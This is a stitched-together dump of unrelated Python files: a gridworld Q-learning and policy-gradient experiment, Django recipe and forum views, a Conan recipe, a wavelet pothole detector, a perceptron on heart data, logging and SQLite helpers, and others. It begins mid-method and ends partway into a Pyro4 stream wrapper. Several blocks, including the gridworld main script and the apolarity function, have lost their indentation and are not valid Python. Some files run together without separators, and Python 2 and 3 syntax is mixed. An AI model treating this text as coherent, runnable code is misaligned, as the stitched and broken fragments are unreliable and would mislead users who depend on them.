            if state in next_states:
                s_id = next_states.index(state)
                state_probabilities[s_id] += prob
            else:
                next_states.append(state)
                state_probabilities.append(prob)
        else:
            next_states.append(new_state)
            state_probabilities.append(prob)

    def get_next_states(self, state, action):
        """Return (reward, next_states, probabilities) for taking *action* in
        *state* under the 0.8 intended / 0.1 slip-left / 0.1 slip-right model.
        Terminal and blocked states have no successors.
        """
        if state in [(1, 1), (3, 2), (3, 1)]:
            return self.state_space.get_reward(state), [], np.array([])
        reward = self.state_space.get_reward(state)
        next_states = []
        state_probabilities = []
        # no err
        step = self.action_steps[action]
        new_state = (state[0] + step[0], state[1] + step[1])
        self._add_next_state(next_states, state_probabilities, state, new_state, 0.8)
        # err left
        step = self.action_steps[self.relative_actions[(action, 'L')]]
        new_state = (state[0] + step[0], state[1] + step[1])
        self._add_next_state(next_states, state_probabilities, state, new_state, 0.1)
        # err right
        step = self.action_steps[self.relative_actions[(action, 'R')]]
        new_state = (state[0] + step[0], state[1] + step[1])
        self._add_next_state(next_states, state_probabilities, state, new_state, 0.1)
        return reward, next_states, np.array(state_probabilities)
class SimpleGridWorldAgent(Agent):
    """Baseline agent that ignores state and acts uniformly at random."""

    def __init__(self):
        Agent.__init__(self, action_space=SimpleGridWorldActionSpace())

    def reset(self):
        # Stateless agent: nothing to reset between episodes.
        pass

    def get_action(self, state, available_actions=None):
        # NOTE(review): np.random.choice over the action-space object assumes
        # FiniteActionSpace behaves like a sequence -- confirm in rllib.space.
        return np.random.choice(self.action_space)

    def perceive(self, new_state, reward, available_actions, reached_goal_state=False, episode_end=False):
        # Reward is ignored; just pick the next random action.
        return self.get_action(new_state)
if __name__ == "__main__":
env = SimpleGridWorldEnvironment()
action_space = SimpleGridWorldActionSpace()
q_opt = calculate_optimal_q_dp(env, action_space, discount_factor=1.0, eps=1e-9)
print q_opt
epoch_count = 20
episodes_per_epoch = 5000
eps_schedule = GreedyEpsilonLinearSchedule(start_eps=1.0, end_eps=0.1, no_episodes=epoch_count*episodes_per_epoch,
decrease_period=episodes_per_epoch)
rewards = np.zeros(epoch_count)
# q-learning
# q_function = QTableLookup(env.state_space, action_space, learning_rate=0.05)
q_function = QNeuralNetwork([], env.state_space, action_space, learning_rate=0.01)
q_learner = QLearningAgent(q_function, discount_factor=1.0, greed_eps=eps_schedule)
for e in range(epoch_count):
for i in range(episodes_per_epoch):
progress_bar(i+1, max=episodes_per_epoch, update_freq=episodes_per_epoch/100)
s, a, r = env.run(q_learner, np.inf)
rewards[e] += np.sum(r)
rewards[e] /= episodes_per_epoch
print("Epoch {0:d}| Avg. reward per episode: {1:f}".format(e+1, rewards[e]))
q_learner.set_learning_mode(False)
reward = 0.0
for i in range(1000):
s, a, r = env.run(q_learner, np.inf)
reward += np.sum(r)
print("Avg. reward with greedy policy: {0:f}".format(reward/1000))
for state in env.state_space:
print q_function.get_q(state)
# policy gradient
input_dim = env.state_space.to_vector(env.state_space.get_initial_state()).shape
nn = lasagne.layers.InputLayer(shape=(1,) + input_dim)
nn = lasagne.layers.DenseLayer(incoming=nn, num_units=len(action_space), W=lasagne.init.Normal(0.01), b=None,
nonlinearity=lasagne.nonlinearities.softmax)
policy_function = PolicyNeuralNetworkMultinomial(nn, env.state_space, action_space, learning_rate=0.001,
optimizer=sgd)
pg_learner = PolicyGradientAgent(policy_function, discount_factor=1.0, update_freq=1000)
for e in range(epoch_count):
for i in range(episodes_per_epoch):
progress_bar(i+1, max=episodes_per_epoch, update_freq=episodes_per_epoch/100)
s, a, r = env.run(pg_learner, np.inf)
rewards[e] += np.sum(r)
rewards[e] /= episodes_per_epoch
print("Epoch {0:d}| Avg. reward per episode: {1:f}".format(e+1, rewards[e]))
pg_learner.set_learning_mode(False)
reward = 0.0
for i in range(1000):
s, a, r = env.run(pg_learner, np.inf)
reward += np.sum(r)
print("Avg. reward with learned policy: {0:f}".format(reward/1000))
for s in env.state_space:
print policy_function._forward(env.state_space.to_vector(s)[np.newaxis, :])
|
#!/usr/bin/env python2
"""Read 'eth <src> <dst> <ethertype>' lines from stdin and write a Graphviz
digraph (one edge per unique src/dst/protocol triple) to the file named by
argv[1]."""
import sys

# Map the EtherType values of interest to the protocol name used as edge
# label; frames with any other EtherType are ignored (original behaviour).
ETHERTYPE_NAMES = {34525: 'IPv6', 2054: 'ARP', 2048: 'IPv4'}

grafo = open(sys.argv[1], 'w+')
grafo.write('digraph {\n')
# Used as an ordered set of 'src-dst-PROTO' keys; the values are never
# incremented, only key presence matters.
temp = dict()
for line in sys.stdin:
    values = line.strip().split()
    if values[0] == 'eth':
        # Bug-prone duplication removed: the original repeated the same
        # key-building/insert block once per protocol and parsed values[3]
        # up to three times per line.
        ethertype = int(values[3])
        if ethertype in ETHERTYPE_NAMES:
            key = values[1] + '-' + values[2] + '-' + ETHERTYPE_NAMES[ethertype]
            temp.setdefault(key, 0)
for key, value in temp.items():
    values = key.split('-')
    grafo.write('"' + values[0] + '" -> "' + values[1] + '"[label=' + values[2] + '];\n')
grafo.write('}\n')
grafo.close()
|
from django.core.exceptions import ValidationError
from rest_framework import viewsets, status, permissions
from rest_framework.decorators import action
from rest_framework.response import Response
from rest_framework_extensions.mixins import NestedViewSetMixin
from apps.recipes.models import Recipe, Step
from apps.recipes.serializers import StepSerializer
class StepViewSet(NestedViewSetMixin, viewsets.ModelViewSet):
    """
    Allows recipe steps to be viewed or edited (nested under a recipe).
    """
    queryset = Step.objects.all()
    serializer_class = StepSerializer
    permission_classes = [permissions.IsAuthenticated]

    @staticmethod
    def _get_recipe(kwargs):
        """Return the parent Recipe for this nested route, or None if absent.

        Bug fix: the original used Recipe.objects.get(), which raises
        Recipe.DoesNotExist instead of returning None, so every
        `if not recipe` guard below was dead code and a missing recipe
        produced a 500 instead of the intended 404.
        """
        return Recipe.objects.filter(pk=kwargs['parent_lookup_recipe_id']).first()

    def list(self, request, *args, **kwargs):
        """Return the recipe's steps ordered by their `order` field."""
        recipe = self._get_recipe(kwargs)
        if not recipe:
            return Response(status=status.HTTP_404_NOT_FOUND)
        queryset = recipe.steps.all().order_by('order')
        return Response(status=status.HTTP_200_OK, data=StepSerializer(queryset, many=True).data)

    def create(self, request, *args, **kwargs):
        """Append a new step; optionally move it to the requested position."""
        recipe = self._get_recipe(kwargs)
        if not recipe:
            return Response(status=status.HTTP_404_NOT_FOUND)
        step = Step(text=request.data['text'], order=recipe.steps.count(), recipe_id=recipe.pk)
        step.save()
        try:
            recipe.move_step(step, request.data['order'])
        except KeyError:
            # 'order' is optional: without it the new step stays at the end.
            pass
        return Response(status=status.HTTP_201_CREATED, data=StepSerializer(step).data)

    def destroy(self, request, *args, **kwargs):
        """Delete a step and close the gap in the remaining steps' ordering."""
        recipe = self._get_recipe(kwargs)
        if not recipe:
            return Response(status=status.HTTP_404_NOT_FOUND)
        step = self.get_object()
        step.delete()
        recipe.reorder_steps()
        return Response(status=status.HTTP_204_NO_CONTENT)

    @action(methods=['put'], detail=True, url_path='move', url_name='recipe-steps_move')
    def move(self, request, pk=None, *args, **kwargs):
        """
        Move a step to the position given in request.data['order'].
        """
        recipe = self._get_recipe(kwargs)
        if not recipe:
            return Response(status=status.HTTP_404_NOT_FOUND)
        step = self.get_object()
        if not step:
            return Response(status=status.HTTP_404_NOT_FOUND)
        try:
            recipe.move_step(step, request.data['order'])
        except Step.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        except IndexError as err:
            return Response(status=status.HTTP_400_BAD_REQUEST, data=str(err))
        return Response(status=status.HTTP_200_OK)
|
# coding: utf8
from django.shortcuts import get_object_or_404, redirect
from django.views.generic.list import ListView
from django.views.generic.base import View
from django.views.generic.edit import DeleteView, CreateView, UpdateView
from braces.views import LoginRequiredMixin, JSONResponseMixin
from forum.models import Blog, Comment
from django.core import exceptions
from django.core.urlresolvers import reverse_lazy
from django.contrib.auth.decorators import login_required
from django.views.decorators.http import require_POST
from django.contrib import messages
from django import forms
class BlogView(ListView):
    """Blog detail page: shows one blog plus a paginated list of its comments."""
    template_name = 'blogs/show.html'
    http_method_names = ['get']
    model = Blog
    paginate_by = 20

    def get(self, request, *args, **kwargs):
        # Resolve the blog once so get_queryset/get_context_data can reuse it.
        id = self.kwargs.get('id')
        self.blog = get_object_or_404(Blog, pk=id)
        return super(BlogView, self).get(request, *args, **kwargs)

    def get_queryset(self):
        # The paginated objects are the blog's comments, not blogs.
        return self.blog.comment_set.all()

    def get_context_data(self, **kwargs):
        self.blog.hit()  # count this page view
        if self.request.user.is_authenticated():
            # Viewing the blog clears any pending notifications about it.
            self.request.user.clear_notifications_with_blog(self.blog)
        ctx = super(BlogView,self).get_context_data(**kwargs)
        ctx['blog'] = self.blog
        ctx['request'] = self.request
        return ctx
class BlogListView(ListView):
    """Paginated list of all blogs, newest first."""
    template_name = 'blogs/list.html'
    http_method_names = ['get']
    model = Blog
    paginate_by = 20

    def get_queryset(self):
        # Newest blogs first (descending primary key).
        return Blog.objects.order_by('-id')

    def get_context_data(self, **kwargs):
        context = super(BlogListView, self).get_context_data(**kwargs)
        # Highlight the "blog" tab in the navigation.
        context['tab'] = 'blog'
        return context
@require_POST
@login_required
def comment(request, id):
    """Attach a comment to blog *id*; empty content is rejected with a flash."""
    b = get_object_or_404(Blog, pk=id)
    content = request.POST.get('content', '').strip()
    if not content:
        messages.error(request, '评论不能为空')
        return redirect(b)
    # Bug fix: create the comment BEFORE queueing the success flash; the
    # original queued "success" first, so a failure in new_comment() would
    # still show a success message.
    b.new_comment(content=content, author=request.user)
    messages.success(request, '评论成功')
    return redirect(b)
class StickView(LoginRequiredMixin, JSONResponseMixin, View):
    """Superuser-only JSON endpoint that sticks (pins) a blog.

    Bug fix: the bases were ordered (View, LoginRequiredMixin, ...), which
    puts View.dispatch before the mixin in the MRO, so LoginRequiredMixin
    never ran and anonymous users were not redirected to login. Mixins must
    precede View.
    """
    http_method_names = ['post']

    def post(self, request, id):
        if not request.user.is_superuser:
            return self.render_json_response('permission denied', 403)
        t = get_object_or_404(Blog, pk=id)
        t.stick()
        return self.render_json_response({
            'status': 'ok'
        })
class UnstickView(LoginRequiredMixin, JSONResponseMixin, View):
    """Superuser-only JSON endpoint that unsticks (unpins) a blog.

    Bug fix: mixins moved before View in the base list; with View first, its
    dispatch preceded LoginRequiredMixin in the MRO and the login requirement
    was never enforced.
    """
    http_method_names = ['post']

    def post(self, request, id):
        if not request.user.is_superuser:
            return self.render_json_response('permission denied', 403)
        t = get_object_or_404(Blog, pk=id)
        t.unstick()
        return self.render_json_response({
            'status': 'ok'
        })
class DeleteCommentView(LoginRequiredMixin, DeleteView):
    """Confirm-and-delete view for a single comment.

    Only the comment's author or a superuser may delete it.
    """
    template_name = 'common/delete.html'

    def get_object(self, queryset=None):
        target = get_object_or_404(Comment, pk=self.request.GET.get('delete_comment_id'))
        is_owner = target.author == self.request.user
        if not (is_owner or self.request.user.is_superuser):
            raise exceptions.PermissionDenied
        return target

    def get_success_url(self):
        # Back to the blog the comment belonged to.
        return self.object.blog.get_absolute_url()
class BlogForm(forms.ModelForm):
    """Create/edit form for Blog: title, content and cover image are all
    required (the error messages are user-facing Chinese strings)."""
    title = forms.CharField(initial='', error_messages={
        'required': '主题不能为空',
    })
    content = forms.CharField(initial='', widget=forms.Textarea(), error_messages={
        'required': '正文不能为空'
    })
    cover = forms.ImageField(error_messages={
        'required': '封面不能为空'
    })

    class Meta:
        model = Blog
        fields = ['title', 'content', 'cover']
class NewBlogView(LoginRequiredMixin, CreateView):
    """Create a new blog; the logged-in user becomes its author."""
    template_name = 'blogs/new.html'
    model = Blog
    form_class = BlogForm

    def form_valid(self, form):
        # Stamp the current user as author before the parent class saves.
        form.instance.author = self.request.user
        messages.success(self.request, '主题创建成功')
        return super(NewBlogView, self).form_valid(form)
class UpdateBlogView(LoginRequiredMixin, UpdateView):
    """Edit an existing blog; restricted to its author or a superuser."""
    template_name = 'blogs/edit.html'
    model = Blog
    form_class = BlogForm

    def form_valid(self, form):
        messages.success(self.request, '主题修改成功')
        # Bug fix: the original called super(UpdateView, self), naming the
        # wrong class and starting the MRO lookup past UpdateView; super()
        # must name this class.
        return super(UpdateBlogView, self).form_valid(form)

    def get_object(self, queryset=None):
        blog = get_object_or_404(Blog, pk=self.kwargs['id'])
        if blog.author != self.request.user and not self.request.user.is_superuser:
            raise exceptions.PermissionDenied
        return blog
class DeleteBlogView(LoginRequiredMixin, DeleteView):
    """Delete a blog; restricted to its author or a superuser."""
    template_name = 'common/delete.html'
    success_url = reverse_lazy('index')

    def get_object(self, queryset=None):
        blog = get_object_or_404(Blog, pk=self.kwargs['id'])
        allowed = blog.author == self.request.user or self.request.user.is_superuser
        if not allowed:
            raise exceptions.PermissionDenied
        return blog
from conans import ConanFile, tools, CMake
from conans.errors import ConanInvalidConfiguration, ConanException
import os
class Sol2Conan(ConanFile):
    """Conan recipe for sol2, a header-only C++ Lua binding library."""
    name = "sol2"
    url = "https://github.com/conan-io/conan-center-index"
    homepage = "https://github.com/ThePhD/sol2"
    description = "C++17 Lua bindings"
    topics = ("conan", "lua", "c++", "bindings")
    settings = "os", "compiler", "build_type", "arch"
    license = "MIT"
    requires = ["lua/5.3.5"]

    _source_subfolder = "source_subfolder"
    _build_subfolder = "build_subfolder"
    _cmake = None

    def source(self):
        """Fetch the release tarball and normalize the extracted folder name."""
        tools.get(**self.conan_data["sources"][self.version])
        extracted_dir = self.name + "-" + self.version
        os.rename(extracted_dir, self._source_subfolder)

    def _configure_cmake(self):
        # Lazily create and cache the CMake helper.
        if self._cmake:
            return self._cmake
        self._cmake = CMake(self)
        self._cmake.configure(
            source_folder=self._source_subfolder,
            build_folder=self._build_subfolder
        )
        return self._cmake

    def configure(self):
        """Validate that the compiler provides at least C++14."""
        if self.settings.compiler.get_safe("cppstd"):
            tools.check_min_cppstd(self, "14")
        compiler = str(self.settings.compiler)
        comp_version = tools.Version(self.settings.compiler.version)
        # Minimum compiler versions known to provide C++14 support.
        compilers = {"Visual Studio": "14", "gcc": "5",
                     "clang": "3.2", "apple-clang": "4.3"}
        min_version = compilers.get(compiler)
        if not min_version:
            # Bug fix: the original mixed "%s" with str.format(), so the
            # compiler name was never substituted into the warning.
            self.output.warn(
                "sol2 recipe lacks information about the {} compiler support".format(compiler))
        elif comp_version < min_version:
            raise ConanInvalidConfiguration("sol2 requires C++14 or higher support standard."
                                            " {} {} is not supported."
                                            .format(compiler, comp_version))

    def build(self):
        cmake = self._configure_cmake()
        cmake.build()

    def package(self):
        self.copy("LICENSE.txt", src=self._source_subfolder, dst="licenses")
        cmake = self._configure_cmake()
        cmake.install()
        # share/ contains only pkgconfig files -- not needed for a header-only package
        tools.rmdir(os.path.join(self.package_folder, "share"))
        # lib/ contains only cmake config files -- not needed either
        tools.rmdir(os.path.join(self.package_folder, "lib"))

    def package_id(self):
        # Header-only: the package is independent of settings/options.
        self.info.header_only()

    def package_info(self):
        if self.options["lua"].compile_as_cpp:
            self.cpp_info.defines.append("SOL_USING_CXX_LUA=1")
|
import matplotlib.pyplot as plt
import numpy as np
import os
import math as math
import wavelet

# Pothole-detection script (Python 2: xrange): for every measurement file in
# `path`, run a Haar wavelet (a trous) cascade on the z accelerometer channel,
# apply successive thresholds, and plot samples exceeding the first threshold
# as pothole candidates.
path = "Medicoes ponte dia 07-02-2019/"
files_in_dir = []
wav_levels = 2    # number of wavelet decomposition levels
n_cortes = 3      # number of successive threshold cuts
fator = 4         # initial threshold factor (decremented each cut)
ocorrencias = []  # accumulated (file index, file name, value, sample) hits

# Collect every .txt/.csv data file, skipping the readme.
for file_ in os.listdir(path):
    file_str = str(file_)
    if(file_str.endswith(".txt") or file_str.endswith(".csv")) and not file_str.endswith("readme.txt"):
        files_in_dir.append(file_)

for index, file_ in enumerate(files_in_dir):
    # z is the channel of interest, restricted to the file's valid range.
    x,y,z = wavelet.readfile_xyz(path + file_, ' ')
    inicio, fim = wavelet.readfile_limits(path + file_, ' ')
    z = z[inicio:fim]
    # Cascade decomposition: c holds approximation coefficients per level,
    # d holds detail coefficients per level.
    c = []
    d = []
    d_temp = list(z)
    for i in xrange(wav_levels):
        ca_temp, cd_temp = wavelet.cascade_wavelet(d_temp)
        c.append(list(ca_temp))
        d.append(list(cd_temp))
        d_temp = cd_temp
    #ultimo nivel (last level's approximation is what gets thresholded)
    d_corte = c[wav_levels - 1]
    cortes = []
    cortes.append(list(d_corte))
    fator_local = fator
    sups = []          # upper thresholds per cut
    infs = []          # lower thresholds per cut
    complementares = []  # samples removed by each cut (the candidates)
    for i in xrange(n_cortes):
        lamb_sup, lamb_inf = wavelet.threshold(fator_local, d_corte)
        sups.append(lamb_sup)
        infs.append(lamb_inf)
        d_corte, complementar = wavelet.corte_e_complementar_cascade(lamb_sup, lamb_inf, d_corte)
        complementares.append(list(complementar))
        cortes.append(list(d_corte))
        fator_local = fator_local - 1
    fig, ax = plt.subplots(1,1)
    #ax.set_title("Wavelet nivel "+str(wav_levels)+" - "+str(n_cortes)+" cortes de threshold")
    ax.set_title("HWT a trous algorithm - $D_{"+str(wav_levels)+"}$ $\lambda_1$ - " + file_[:-4])
    ax.set_xlabel("Samples")
    ax.set_ylabel("(G)")
    ax.step(range(len(cortes[0])), cortes[0], label='$D_{'+str(wav_levels)+'}$', alpha=0.4 )
    ax.step(range(len(cortes[1])), cortes[1], label='$D_{'+str(wav_levels)+'}$ - $\lambda_1$', color='green')
    # Mark every sample removed by the FIRST cut as a pothole candidate;
    # check_var ensures the legend label is only added once.
    complementar = complementares[0]
    check_var = True
    for i, v in enumerate(complementar):
        if(v[0] != 0 and check_var):
            ax.scatter(v[1],v[0], s = 15, marker='x', color='black', label='Pothole position')
            ax.text(v[1]+5,v[0], str(v[1]) + ', ' + str(v[0])[0:4])
            check_var = False
            nova_ocorrencia = (index,file_[:-4], v[0],v[1])
            ocorrencias.append(nova_ocorrencia)
        elif v[0] != 0 and not check_var:
            nova_ocorrencia = (index,file_[:-4], v[0],v[1])
            ocorrencias.append(nova_ocorrencia)
            ax.scatter(v[1],v[0], s = 15, marker='x', color='black')
            ax.text(v[1]+5,v[0], str(v[1]) + ', ' + str(v[0])[0:4])
    # Draw the threshold lines (only the first cut is labelled).
    for i in xrange(len(sups)):
        draw_sup = [sups[i]] * len(cortes[0])
        draw_inf = [infs[i]] * len(cortes[0])
        if i == 0:
            ax.plot(draw_sup, linestyle='-.', color='red', label='$\lambda_{sup1}$',alpha=0.7)
            ax.plot(draw_inf, linestyle='-.', color='grey', label='$\lambda_{inf1}$', alpha=0.7)
        # else:
        #     ax.plot(draw_sup, linestyle='-.', color='red')
        #     ax.plot(draw_inf, linestyle='-.', color='grey')
    plt.legend()
    plt.show()
    #plt.savefig(path + "cascata-"+file_[:-4]+"wav"+str(wav_levels)+".png",dpi=500)
    plt.close()

# newlist = [ ]
# for oc in ocorrencias:
#     if oc[1] not in newlist and oc[1].startswith('ida'):
#         newlist.append(oc[1])
# for oc in ocorrencias:
#     if oc[1] not in newlist and oc[1].startswith('volta'):
#         newlist.append(oc[1])
# print('size: ' + str(len(newlist)))
# for i in newlist:
#     print(i)
|
import numpy as np
import matplotlib.pyplot as plt
import math
from scipy.special import comb
#Apolarity condition for P(x) and Q(x)
def apolarity(p, q):
sum=0
for i in range(p.order+1):
sum+=((-1)**i)*(p[i]*q[p.order-i])/(comb(p.order,i))
if sum==0:
return(sum)
else:
return(sum)
# degree of the polynomial P(z)
n=4
# roots of P(z) given as (modulus, argument) pairs; only the first n are used
roots=[[1,np.pi*(2)], [1,np.pi*(1)], [0,np.pi*(1)], [0,np.pi*(4/3)], [0.8,np.pi*(2/1)], [0.05,np.pi*(2/1)]]
z=[]
for i in range(n):
    z.append(roots[i][0]*np.exp(1j*roots[i][1]))
# Build P(z) from its roots, and its derivative P'(z).
p=np.poly1d(z, True)
pDash=np.polyder(p)
# Coefficients of the cubic Q(x) derived from P's roots and P'.
# NOTE(review): formula appears hard-wired for n == 4 -- confirm before changing n.
r=[1, -(2*z[0]+(z[0]+z[1]+z[2]+z[3])/4), -pDash[1]/6, -(pDash[0]/4)-z[0]*(pDash[1])]
q=np.poly1d(r)
print("Q(x)=")
print(q)
print("P'(x)=")
print(pDash)
print("sum=", "%.2f" % apolarity(pDash,q).real, "+", "%.2f" % apolarity(pDash,q).imag,"j")
# Print the roots of Q and the distance from each to the first root of P.
for i in range(n-1):
    print(np.roots(q))
    print(abs(np.roots(q)[i]-z[0]))
import db_helper
def main():
    """Interactive console loop for managing the todo list via db_helper."""
    db_helper.create_table()
    menu = ('1. Insert new task in todo list \n'
            '2. View the todo list \n'
            '3. Delete the task \n'
            '4. exit \n')
    while True:
        print("\n")
        print(menu)
        choice = input("Choose any of above option: ")
        if choice == "1":
            db_helper.data_entry(str(input("Enter your todo: ")))
        elif choice == "2":
            db_helper.printData()
        elif choice == "3":
            db_helper.deleteTask(int(input("Enter the index of the task to be deleted: ")))
        elif choice == "4":
            break
        else:
            print("Please choose valid option")
    # Release the database resources once the user exits the loop.
    db_helper.closeCursor()

if __name__ == '__main__':
    main()
|
import sqlite3

# Path of the SQLite database file this module operates on.
db_name = 'entreprise-sqlite.db'

# This function will connect to the sqlite3 database and then execute the sql
# script string using cursor.executescript().
def execute_sql_script(sql_script_string):
    """Execute a (possibly multi-statement) SQL script against `db_name`.

    Fix: the original leaked the connection and cursor if the script
    raised; both are now released in `finally` blocks.
    """
    conn = sqlite3.connect(db_name)
    try:
        cursor = conn.cursor()
        try:
            # Run the whole script in one call; executescript handles
            # multiple ';'-separated statements.
            cursor.executescript(sql_script_string)
            conn.commit()
        finally:
            cursor.close()
    finally:
        conn.close()
    print('Execute sql script ' + sql_script_string + ' complete.')
# This function will read the sql script text from the external sql file and then run the sql script text.
# This function reads the sql script text from an external sql file and runs it.
def execute_external_sql_script_file(script_file_path):
    """Read an SQL script from `script_file_path` and execute it.

    Fix: uses a context manager so the file handle is closed even if the
    read raises (the original left it open on error).
    """
    with open(script_file_path, 'r') as script_file:
        sql_script_string = script_file.read()
    # Execute the read-out sql script string.
    execute_sql_script(sql_script_string)
if __name__ == '__main__':
    # Bootstrap the database from the bundled recruitment-test script.
    execute_external_sql_script_file('testRecrutement.sql')
from rdflib import Namespace, Graph, Literal, RDF, URIRef
from rdfalchemy.rdfSubject import rdfSubject
from rdfalchemy import rdfSingle, rdfMultiple, rdfList
from brick.brickschema.org.schema._1_0_2.Brick.Average_Discharge_Air_Flow_Sensor import Average_Discharge_Air_Flow_Sensor
from brick.brickschema.org.schema._1_0_2.Brick.Average_Supply_Air_Flow_Sensor import Average_Supply_Air_Flow_Sensor
from brick.brickschema.org.schema._1_0_2.Brick.Discharge_Air_Flow_Sensor import Discharge_Air_Flow_Sensor
class HVAC_Average_Supply_Air_Flow_Sensor(Average_Discharge_Air_Flow_Sensor,Average_Supply_Air_Flow_Sensor,Discharge_Air_Flow_Sensor):
    """Generated Brick 1.0.2 sensor class; rdf_type binds it to its ontology IRI."""
    rdf_type = Namespace('https://brickschema.org/schema/1.0.2/Brick#').HVAC_Average_Supply_Air_Flow_Sensor
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by hubiao on 2017/5/12
from __future__ import unicode_literals
import logging,os,time
from logging.handlers import TimedRotatingFileHandler
import re
class Log(object):
    """Logging helpers that write results under ./TestResult/<YYYY-MM-DD>/."""

    def __init__(self):
        # Create the result root and a per-day sub-directory for log output.
        self.ResultRoot= './TestResult'
        if not os.path.exists(self.ResultRoot):
            os.mkdir(self.ResultRoot)
        date_time = time.strftime('%Y-%m-%d', time.localtime(time.time()))
        self.ResultFile = self.ResultRoot + '/' + date_time
        if not os.path.exists(self.ResultFile):
            os.mkdir(self.ResultFile)

    def set_logger(self):
        # Configure the 'Bussiness' logger with a per-run file handler plus a
        # console handler, both at INFO level.
        # NOTE(review): calling this more than once adds duplicate handlers.
        self.logger = logging.getLogger('Bussiness')
        self.logger.setLevel(logging.INFO)
        filename = self.ResultFile + '/' + 'Bussiness_' + time.strftime('%H%M%S', time.localtime(time.time())) + '.log'
        fh = logging.FileHandler(filename)
        fh.setLevel(logging.INFO)
        ch = logging.StreamHandler()
        ch.setLevel(logging.INFO)
        formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d][%(levelname)s]:%(message)s')
        fh.setFormatter(formatter)
        ch.setFormatter(formatter)
        self.logger.addHandler(fh)
        self.logger.addHandler(ch)

    def initLogging(self,logFileName='applog'):
        '''
        Initialise the root logger with daily rotation, keeping the last
        7 days of log files.
        :param logFileName: log file base name, defaults to 'applog'
        :return: None
        '''
        PATH = lambda p: os.path.abspath(
            os.path.join(os.path.dirname(__file__), p)
        )
        log = logging.getLogger()
        formatter = logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d][%(levelname)s]:%(message)s')
        # Rotate daily; rotated files are suffixed with the date they cover.
        LogFileHander = TimedRotatingFileHandler(filename=PATH('../log/' + logFileName), when='D', interval=1,
                                                 backupCount=7)
        LogFileHander.suffix = "%Y-%m-%d.log"
        LogFileHander.extMatch = re.compile(r"^\d{4}-\d{2}-\d{2}.log$")
        LogFileHander.setFormatter(formatter)
        log.setLevel(logging.DEBUG)
        log.addHandler(LogFileHander)

    # Thin convenience wrappers around the standard logging levels.
    def d(self, msg, *args, **kwargs):
        self.logger.debug(msg, *args, **kwargs)

    def i(self, msg, *args, **kwargs):
        self.logger.info(msg, *args, **kwargs)

    def w(self, msg, *args, **kwargs):
        self.logger.warning(msg, *args, **kwargs)

    def c(self, msg, *args, **kwargs):
        self.logger.critical(msg, *args, **kwargs)

    def e(self, msg, *args, **kwargs):
        self.logger.error(msg, *args, **kwargs)
|
# -*- coding: cp1252 -*-
import random
import pandas as pd
import matplotlib.pyplot as plt
def correl(df):
    # Select the feature columns whose correlation with the target (the
    # DataFrame's last column) exceeds t in absolute value, excluding the
    # trivial +/-1 self-correlation.  NOTE: Python 2 (print statement).
    corr = df.corr()
    t = 0.4
    print "Matriz de Correlação\n\n",corr.iloc[-1].round(2)
    listacolunas = list(corr.columns.values)
    yx = len(listacolunas) -1
    y = listacolunas[yx]
    colunas = []
    cort = corr[[y]]
    # Boolean mask: |corr| >= t but not exactly +/-1.
    colunas = ((cort[y] >= t)&(cort[y] != 1))|((cort[y]<= -t)&(cort[y] != -1))
    dc = cort[colunas]
    #print dc
    # Return the selected feature names plus the target column name.
    select = list(dc.index)
    select.append(y)
    return select
class Perceptron:
    """Single-layer perceptron with weights initialised randomly to +/-1."""

    def __init__(self, p, a):
        # p: number of inputs/weights; a: learning rate.
        self.pesos = [1 if random.randint(0, 1) else -1 for _ in range(p)]
        self.aprend = a

    def teste(self, entradas):
        """Classify `entradas`: -1 if the weighted sum is negative, else 1."""
        soma = 0
        for posicao in range(len(entradas)):
            soma += entradas[posicao] * self.pesos[posicao]
        return -1 if soma < 0 else 1

    def treino(self, entradas, resp):
        """Apply one perceptron-rule update toward the expected answer `resp`."""
        erro = resp - self.teste(entradas)
        for posicao in range(len(entradas)):
            self.pesos[posicao] += erro * entradas[posicao] * self.aprend
# --- Main script (Python 2): sweep the learning rate, train/evaluate the
# --- perceptron on the heart dataset, and plot the accuracy curve.
data = pd.read_csv("heart.csv")
select = correl(data)
print select
Train = pd.read_csv("Heart_Train.csv")
Train = Train[select]
#print Train
# Features are every selected column but the last; response is the last column.
Train_Entry = Train[Train.columns[0:-1]]
Train_Resp = Train[Train.columns[-1]]
Test = pd.read_csv("Heart_Test.csv")
Test = Test[select]
#print Test
Test_Entry = Test[Test.columns[0:-1]]
Test_Resp = Test[Test.columns[-1]]
#print tudo,entrada,resp
tam = len(Train.columns)
aprend = 0
graf_X = []
graf_Y = []
best = 0
best_list = []
# Sweep the learning rate from 0 to 1 in steps of 0.1.
while(aprend<=1):
    P = Perceptron(tam,aprend)
    prev_list = []
    # 30 epochs; each epoch trains from both ends of the training set
    # toward the middle.
    for k in range(30):
        i=0
        j=len(Train_Entry.index) -1
        while(i<j):
            P.treino(Train_Entry.iloc[i],Train_Resp.iloc[i])
            P.treino(Train_Entry.iloc[j],Train_Resp.iloc[j])
            i+=1
            j-=1
    erros = 0
    test_size = len(Test_Entry.index)
    for i in range(test_size):
        prev = P.teste(Test_Entry.iloc[i])
        prev_list.append(prev)
        if(prev!=Test_Resp.iloc[i]):
            erros+=1
    # Keep the prediction list of the best-scoring learning rate.
    # NOTE(review): `best` itself is never updated, so every rate with a
    # positive score overwrites best_list -- confirm whether intended.
    if(best<100 - ((100*erros)/test_size)):
        best_list = prev_list
    graf_Y.append(100 - ((100*erros)/test_size))
    graf_X.append(aprend)
    print "Taxa de Aprendizagem : ",aprend,"\nNumero de Erros : ",erros,"\nPorcentagem de Acerto :",100 - ((100*erros)/test_size),"%"
    aprend+=0.1
# Top plot: accuracy vs learning rate; bottom plot: best predictions.
plt.subplot(211)
plt.plot(graf_X,graf_Y)
plt.xlabel('Taxa de Aprendizagem')
plt.ylabel('% de Acerto')
plt.subplot(212)
plt.plot(Test_Entry,best_list)
plt.xlabel('Taxa de Aprendizagem')
plt.ylabel('% de Acerto')
plt.show()
|
# -*- coding: utf-8 -*-
import Pyro4
import sys
import importlib.util
import os
# reload(sys)
# sys.setdefaultencoding('utf-8')
class Unbuffered(object):
    """Stream wrapper that flushes the underlying stream after every write.

    Any attribute not defined here is delegated to the wrapped stream, so
    the wrapper is a drop-in replacement for sys.stdout / sys.stderr.
    """

    def __init__(self, stream):
        self.stream = stream

    def _forward_and_flush(self, write_call, payload):
        # Forward the write, then force a flush so no output stays buffered.
        write_call(payload)
        self.stream.flush()

    def write(self, data):
        self._forward_and_flush(self.stream.write, data)

    def writelines(self, datas):
        self._forward_and_flush(self.stream.writelines, datas)

